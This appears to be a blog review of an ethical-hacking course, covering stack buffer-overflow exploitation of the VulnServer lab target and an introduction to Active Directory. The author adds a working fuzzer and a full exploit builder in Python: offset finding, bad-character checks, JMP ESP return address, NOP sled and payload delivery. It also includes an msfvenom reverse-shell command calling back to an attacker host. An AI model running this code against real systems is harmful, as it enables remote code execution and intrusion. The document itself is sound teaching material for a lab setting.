Reviewing the Practical Network Penetration Tester (PNPT) Course Pt. 5
In Part 4 I covered the Scanning and Enumeration and Exploitation Basics sections of Practical Ethical Hacking — The Complete Course. In that review we walked through several ways to scan a target and enumerate it for vulnerabilities, and covered tools that identify potentially vulnerable services and ports along with publicly available exploits for them. From content discovery and page enumeration on web applications to vulnerable SMB/Samba services, we walked through different exploits and the difference between staged and non-staged payloads. Finally we touched on credential stuffing against SSH with breached credentials and the half-way mark capstone project.
Let’s dive into the next two sections of Practical Ethical Hacking — The Complete Course: Introduction to Exploit Development (Buffer Overflow) and Active Directory Overview.
The Exploit Development module starts by running through the installation material needed to practice along, Immunity Debugger and VulnServer, both running on a Windows victim machine. Heath then explains what a buffer overflow is and breaks down the anatomy of memory: kernel, stack and heap, and the data and text segments. To understand how buffer overflow vulnerabilities occur and how they are exploited, Heath first explains the 32-bit x86 registers involved, the Extended Stack Pointer (ESP), the buffer space, the Extended Base Pointer (EBP) and the Extended Instruction Pointer (EIP), which holds the return address, before demonstrating how a long enough string of characters spills out of the buffer, overwrites EIP and hands the attacker control of execution. From that overview Heath moves on to spiking: throwing garbage at each of the program’s commands in turn to find one whose input handling crashes the process. Once a vulnerable command is found, we switch to fuzzing, which works the same way but targets that single command and sends an increasingly long string until the program crashes, giving a rough idea of the buffer size.
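The fuzzing step described above, as an added example (my code, not the course’s script): it sends growing buffers to one command of VulnServer and reports the length at which the service stops answering. The target address, port and the TRUN command prefix are assumptions for a lab VM; adjust them for your own setup. The crash is often only visible on the next connection attempt, which is why the docstring says to confirm the size in Immunity Debugger rather than trust the number blindly.

```python
import socket
import sys

# Constructed lab values (assumptions): VulnServer listening on a lab VM.
TARGET = ("192.168.56.101", 9999)
PREFIX = b"TRUN /.:/"   # the VulnServer command under test; the spike tells you which one crashes
TIMEOUT = 5             # seconds; a crashed VulnServer simply stops answering


def fuzz_payload(prefix, length):
    """Command prefix followed by `length` bytes of filler, exactly what gets sent."""
    return prefix + b"A" * length


def fuzz_lengths(start=100, step=100, limit=5000):
    """The buffer sizes to try, growing linearly like the course's fuzzer."""
    return range(start, limit + 1, step)


def fuzz(target, prefix, start=100, step=100, limit=5000, timeout=TIMEOUT):
    """Send ever-larger buffers and return the length that was being sent when the
    service stopped responding, or None if it survived up to `limit`.

    The crash is often only observed on the *next* connection attempt, so when
    this returns N the buffer that killed the process is usually the one of
    length N - step. Confirm in Immunity Debugger before trusting the number."""
    for length in fuzz_lengths(start, step, limit):
        try:
            with socket.create_connection(target, timeout=timeout) as s:
                s.recv(1024)                      # banner
                s.sendall(fuzz_payload(prefix, length))
                s.recv(1024)                      # "TRUN COMPLETE" if still alive
        except OSError:                           # timeout, reset or refused connection
            return length
        print(f"[+] {length} bytes sent, service still up", file=sys.stderr)
    return None


if __name__ == "__main__":
    crashed_at = fuzz(TARGET, PREFIX)
    if crashed_at is None:
        print("no crash observed up to the limit")
    else:
        print(f"service stopped responding while sending {crashed_at} bytes")
```

Run it with Immunity Debugger attached to vulnserver.exe: when the script reports a failure, the debugger should show the access violation with EIP overwritten by 41414141, the ASCII A’s.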
Once a vulnerable command has been found and the buffer manually overflowed, Heath teaches us how to find the exact offset at which EIP gets overwritten. Instead of a run of identical characters, a unique, non-repeating pattern is sent (generated with Metasploit’s pattern_create), and the four bytes that land in EIP after the crash are looked up with pattern_offset to give the offset. Heath then demonstrates using that offset to place four chosen bytes exactly into EIP, for example four B’s (0x42424242), which confirms we control the return address. Controlling EIP is what later lets us redirect execution into shellcode and get a shell on the server, but before any shellcode can be written we have to identify the bad characters.
Bad characters are byte values that the target program mangles, truncates or drops when it processes input, so they cannot appear anywhere in the shellcode (a great resource can be found here). The null byte 0x00 is almost always bad because it terminates C strings; the others depend on the program. They are identified by sending every byte value from 0x01 to 0xFF right after the EIP overwrite and inspecting a hex dump of the stack in the debugger: any byte that is missing or altered is bad (the byte following a bad one often looks corrupted too, so it is re-tested once the first one is removed), and the process is repeated until the dump matches what was sent.
Before a working exploit can be built we also need a reliable address to put into EIP: a JMP ESP instruction (opcode FF E4) inside a module loaded by the program, typically a DLL, that was compiled without memory protections such as ASLR, DEP, SafeSEH and Rebase, so that its address does not change between runs. Heath uses mona.py, a plugin for Immunity Debugger: the !mona modules command lists the loaded modules and their protections, and !mona find searches a chosen module for the JMP ESP bytes. Mona also automates bad-character testing by generating the byte array to send and comparing it against memory, which cuts down the time spent on manual hex-dump comparison.
Now that we can identify vulnerable functions, have located a return point and know how to write shellcode, we learn how these pieces come together to gain a shell on the target, which in the course’s lab gives administrative or “root” level access (in practice the shell runs with whatever privileges the vulnerable service has). Heath explains how to generate reverse-shell shellcode with MSFVenom, excluding the bad characters found earlier, and how to add a No Operation (NOP, 0x90) sled between the return address and the shellcode so that execution slides safely into the payload even if ESP does not land exactly at its start and the shellcode’s decoder stub has room to work.
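The offset, bad-character and payload-assembly steps described above, as one added example (my code, not the course’s scripts). It reimplements the cyclic pattern and offset lookup that Metasploit’s pattern_create and pattern_offset perform, generates the bad-character string, compares it against a stack dump, and assembles the final buffer with a little-endian return address and a NOP sled. The target address, the TRUN prefix, the JMP ESP address and the shellcode are placeholders and assumptions for a lab target; replace the last two with what mona and msfvenom give you.

```python
import socket
import string
import struct

# Constructed lab values (assumptions, not from the course text). JMP_ESP and
# SHELLCODE are placeholders to be replaced with mona's and msfvenom's output.
TARGET = ("192.168.56.101", 9999)
PREFIX = b"TRUN /.:/"
JMP_ESP = 0x625011AF          # placeholder: address of FF E4 in a module without ASLR/DEP/SafeSEH
SHELLCODE = b"\xcc" * 8       # placeholder: INT3 breakpoints; replace with e.g.
# msfvenom -p windows/shell_reverse_tcp LHOST=<attacker> LPORT=4444 EXITFUNC=thread \
#          -f python -a x86 -b "\x00"


def cyclic_pattern(length):
    """Same sequence as Metasploit's pattern_create.rb (Aa0Aa1Aa2...): every
    4-byte window is unique for the first 20280 bytes, so whatever lands in EIP
    identifies its position in the buffer."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def find_offset(pattern, eip_value):
    """Offset of the bytes that ended up in EIP (what pattern_offset.rb -q does).
    The debugger shows EIP as a big-endian number, but x86 stores it little-endian
    on the stack, so the four bytes are reversed before searching."""
    needle = struct.pack("<I", eip_value)
    offset = pattern.find(needle)
    if offset == -1:
        raise ValueError("EIP value not found in pattern; was it read as hex?")
    return offset


def badchar_string(known_bad=b"\x00"):
    """Every byte 0x01..0xFF except those already known to be bad. 0x00 is
    excluded from the start because it terminates C strings."""
    return bytes(b for b in range(1, 256) if b not in known_bad)


def first_mismatch(sent, dumped):
    """Compare the bad-char string that was sent with the bytes read back from
    the stack dump; return the first byte the program mangled or dropped, else
    None. Add it to known_bad and repeat until this returns None."""
    for i, (a, b) in enumerate(zip(sent, dumped)):
        if a != b:
            return sent[i]
    if len(dumped) < len(sent):       # dump cut short: the next byte was dropped
        return sent[len(dumped)]
    return None


# jmp_esp comes from: !mona find -s "\xff\xe4" -m <module without ASLR/DEP/SafeSEH/Rebase>
def build_exploit(prefix, offset, jmp_esp, shellcode, badchars=b"\x00", nop_len=32):
    """prefix + filler up to EIP + little-endian JMP ESP address + NOP sled + shellcode.
    Refuses to build if the return address or the shellcode contains a bad character."""
    ret = struct.pack("<I", jmp_esp)
    for name, part in (("return address", ret), ("shellcode", shellcode)):
        bad = [hex(b) for b in badchars if b in part]
        if bad:
            raise ValueError(f"{name} contains bad characters: {bad}")
    return prefix + b"A" * offset + ret + b"\x90" * nop_len + shellcode


def send(target, payload, timeout=5):
    """Deliver one payload; used for the pattern, the bad-char string and the exploit."""
    with socket.create_connection(target, timeout=timeout) as s:
        s.recv(1024)                   # banner
        s.sendall(payload)


if __name__ == "__main__":
    # Step 1: crash with a unique pattern, read EIP in Immunity, then look it up.
    offset = find_offset(cyclic_pattern(3000), 0x386F4337)   # example EIP value
    # Step 2: confirm control of EIP with four B's at that offset.
    send(TARGET, PREFIX + b"A" * offset + b"B" * 4)
    # Step 3: send all byte values after EIP and compare the stack dump with first_mismatch.
    send(TARGET, PREFIX + b"A" * offset + b"B" * 4 + badchar_string())
    # Step 4: final payload, JMP ESP address and NOP sled in front of the shellcode.
    send(TARGET, build_exploit(PREFIX, offset, JMP_ESP, SHELLCODE))
```

The bad-character check in build_exploit is the step people most often skip: a null byte in the return address or in unencoded shellcode silently truncates the buffer and the exploit fails with no obvious reason, so the builder refuses rather than sends.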
With buffer overflows covered we move on to what Heath describes as “the most overlooked part of current courses” and “one of the most important items to learn when it comes to ethical hacking”, and a topic that comes up regularly in job interviews. Before building a home lab and attacking it, we first need to know what Active Directory is, and Heath does an amazing job covering the fundamentals. Active Directory (AD) is the directory service Microsoft created to manage Windows domain networks; it works much like a phone book for the objects in a domain (users, computers, groups and policies), authenticates users with Kerberos tickets and, as Heath points out, is the most commonly used identity management service in the world. While patchable vulnerabilities do exist, most AD compromise comes from abusing legitimate features, trusts and misconfigurations rather than from unpatched software.
From this overview the course moves toward active attacks with a module dedicated to building the target lab. It covers downloading the necessary ISO files, setting up the domain controller and user machines, properly configuring users, groups and policies, joining the workstations to the domain, and a cloud alternative for those who would rather build the lab in Azure because they lack the resources to run it at home.